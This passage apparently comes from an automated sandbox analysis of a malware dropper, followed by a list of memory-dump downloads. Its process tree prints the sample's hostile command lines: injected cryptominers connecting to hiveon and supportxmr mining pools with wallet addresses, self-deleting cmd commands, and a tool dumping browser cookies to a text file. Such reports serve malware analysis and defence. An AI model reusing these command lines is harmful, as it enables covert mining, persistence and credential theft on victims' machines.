                            • C:\Users\Admin\AppData\Roaming\DD08.tmp.exe
                              "C:\Users\Admin\AppData\Roaming\DD08.tmp.exe"
                              6⤵
                              • Executes dropped EXE
                              • Checks processor information in registry
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2580
                          • C:\Users\Admin\AppData\Roaming\DE12.tmp.exe
                            "C:\Users\Admin\AppData\Roaming\DE12.tmp.exe"
                            5⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of SetThreadContext
                            • Modifies system certificate store
                            PID:2484
                            • C:\Windows\system32\msiexec.exe
                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                              6⤵
                                PID:2800
                              • C:\Windows\system32\msiexec.exe
                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                                6⤵
                                • Blocklisted process makes network request
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2880
                            • C:\Users\Admin\AppData\Roaming\DEAF.tmp.exe
                              "C:\Users\Admin\AppData\Roaming\DEAF.tmp.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:2536
                              • C:\Windows\SysWOW64\cmd.exe
                                /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DEAF.tmp.exe
                                6⤵
                                  PID:2148
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 3
                                    7⤵
                                    • Delays execution with timeout.exe
                                    PID:2208
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                5⤵
                                  PID:2232
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1
                                    6⤵
                                    • Runs ping.exe
                                    PID:2344
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:2324
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2780
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                PID:2504
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2512
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2332
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1812
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3032

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/872-125-0x0000000000BD0000-0x0000000000C37000-memory.dmp

                          Filesize

                          412KB

                          Download

                        • memory/872-118-0x0000000000830000-0x0000000000874000-memory.dmp

                          Filesize

                          272KB

                          Download

                        • memory/884-197-0x0000000005010000-0x0000000005011000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/892-2-0x0000000074D91000-0x0000000074D93000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/992-45-0x000007FEF7570000-0x000007FEF77EA000-memory.dmp

                          Filesize

                          2.5MB

                          Download

                        • memory/1016-202-0x0000000000401000-0x00000000004B7000-memory.dmp

                          Filesize

                          728KB

                          Download

                        • memory/1236-71-0x0000000000401000-0x000000000040C000-memory.dmp

                          Filesize

                          44KB

                          Download

                        • memory/1344-43-0x000007FEF5160000-0x000007FEF5B4C000-memory.dmp

                          Filesize

                          9.9MB

                          Download

                        • memory/1344-50-0x000000001AE30000-0x000000001AE32000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/1344-48-0x0000000000F20000-0x0000000000F21000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1352-73-0x000007FEF0FB0000-0x000007FEF194D000-memory.dmp

                          Filesize

                          9.6MB

                          Download

                        • memory/1352-70-0x00000000022B0000-0x00000000022B2000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/1352-54-0x000007FEF0FB0000-0x000007FEF194D000-memory.dmp

                          Filesize

                          9.6MB

                          Download

                        • memory/1620-78-0x0000000000240000-0x0000000000241000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1964-86-0x000007FEF0FB0000-0x000007FEF194D000-memory.dmp

                          Filesize

                          9.6MB

                          Download

                        • memory/1964-87-0x000007FEF0FB0000-0x000007FEF194D000-memory.dmp

                          Filesize

                          9.6MB

                          Download

                        • memory/1964-89-0x0000000000B30000-0x0000000000B32000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/2004-42-0x0000000002390000-0x000000000252C000-memory.dmp

                          Filesize

                          1.6MB

                          Download

                        • memory/2124-158-0x0000000000400000-0x000000000043D000-memory.dmp

                          Filesize

                          244KB

                          Download

                        • memory/2124-157-0x0000000000220000-0x000000000025C000-memory.dmp

                          Filesize

                          240KB

                          Download

                        • memory/2124-154-0x0000000000400000-0x000000000043D000-memory.dmp

                          Filesize

                          244KB

                          Download

                        • memory/2192-116-0x0000000002600000-0x0000000002604000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/2212-135-0x0000000002590000-0x00000000025D8000-memory.dmp

                          Filesize

                          288KB

                          Download

                        • memory/2212-106-0x0000000000020000-0x000000000002D000-memory.dmp

                          Filesize

                          52KB

                          Download

                        • memory/2232-186-0x0000000002740000-0x0000000002744000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/2340-204-0x000000006E421000-0x000000006E423000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/2340-203-0x00000000003D0000-0x00000000003D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2360-122-0x0000000000170000-0x00000000001AA000-memory.dmp

                          Filesize

                          232KB

                          Download

                        • memory/2360-123-0x0000000000360000-0x00000000003B6000-memory.dmp

                          Filesize

                          344KB

                          Download

                        • memory/2416-127-0x00000000004B0000-0x0000000000517000-memory.dmp

                          Filesize

                          412KB

                          Download

                        • memory/2416-173-0x0000000002770000-0x0000000002873000-memory.dmp

                          Filesize

                          1.0MB

                          Download

                        • memory/2464-130-0x0000000001CE0000-0x0000000001CF1000-memory.dmp

                          Filesize

                          68KB

                          Download

                        • memory/2464-136-0x0000000000260000-0x00000000002A7000-memory.dmp

                          Filesize

                          284KB

                          Download

                        • memory/2484-134-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/2536-148-0x00000000071C0000-0x000000000C63C000-memory.dmp

                          Filesize

                          84.5MB

                          Download

                        • memory/2536-150-0x0000000000400000-0x000000000587C000-memory.dmp

                          Filesize

                          84.5MB

                          Download

                        • memory/2544-228-0x0000000066806000-0x0000000066CCF000-memory.dmp

                          Filesize

                          4.8MB

                          Download

                        • memory/2544-224-0x0000000001120000-0x0000000001121000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2544-227-0x00000000668F6000-0x0000000066DBF000-memory.dmp

                          Filesize

                          4.8MB

                          Download

                        • memory/2544-345-0x0000000066D95000-0x0000000066DBF000-memory.dmp

                          Filesize

                          168KB

                          Download

                        • memory/2544-209-0x0000000000A70000-0x0000000000A80000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/2544-344-0x0000000066CA5000-0x0000000066CCF000-memory.dmp

                          Filesize

                          168KB

                          Download

                        • memory/2544-235-0x00000000669E6000-0x0000000066EAF000-memory.dmp

                          Filesize

                          4.8MB

                          Download

                        • memory/2544-236-0x0000000065E66000-0x000000006632F000-memory.dmp

                          Filesize

                          4.8MB

                          Download

                        • memory/2544-255-0x0000000065DF6000-0x00000000662BF000-memory.dmp

                          Filesize

                          4.8MB

                          Download

                        • memory/2544-246-0x0000000066886000-0x0000000066D4F000-memory.dmp

                          Filesize

                          4.8MB

                          Download

                        • memory/2544-247-0x0000000066796000-0x0000000066C5F000-memory.dmp

                          Filesize

                          4.8MB

                          Download

                        • memory/2544-254-0x0000000066976000-0x0000000066E3F000-memory.dmp

                          Filesize

                          4.8MB

                          Download

                        • memory/2580-131-0x0000000000400000-0x000000000044E000-memory.dmp

                          Filesize

                          312KB

                          Download

                        • memory/2580-137-0x0000000000400000-0x000000000044E000-memory.dmp

                          Filesize

                          312KB

                          Download

                        • memory/2780-166-0x000007FEF50C0000-0x000007FEF5AAC000-memory.dmp

                          Filesize

                          9.9MB

                          Download

                        • memory/2780-172-0x00000000003E0000-0x00000000003E1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2780-171-0x00000000003A0000-0x00000000003DC000-memory.dmp

                          Filesize

                          240KB

                          Download

                        • memory/2780-170-0x000000001AE60000-0x000000001AE62000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/2780-169-0x0000000000390000-0x0000000000391000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2780-167-0x00000000000D0000-0x00000000000D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2800-138-0x0000000140000000-0x0000000140383000-memory.dmp

                          Filesize

                          3.5MB

                          Download

                        • memory/2800-141-0x0000000140000000-0x0000000140383000-memory.dmp

                          Filesize

                          3.5MB

                          Download

                        • memory/2880-147-0x0000000140000000-0x000000014070A000-memory.dmp

                          Filesize

                          7.0MB

                          Download

                        • memory/2880-146-0x0000000000120000-0x0000000000134000-memory.dmp

                          Filesize

                          80KB

                          Download

                        • memory/2880-149-0x0000000140000000-0x000000014070A000-memory.dmp

                          Filesize

                          7.0MB

                          Download

                        • memory/2880-142-0x0000000140000000-0x000000014070A000-memory.dmp

                          Filesize

                          7.0MB

                          Download

                        • memory/2880-156-0x00000000001F0000-0x0000000000210000-memory.dmp

                          Filesize

                          128KB

                          Download

                        • memory/2892-152-0x0000000002660000-0x0000000002664000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/3152-346-0x0000000002780000-0x0000000002784000-memory.dmp

                          Filesize

                          16KB

                          Download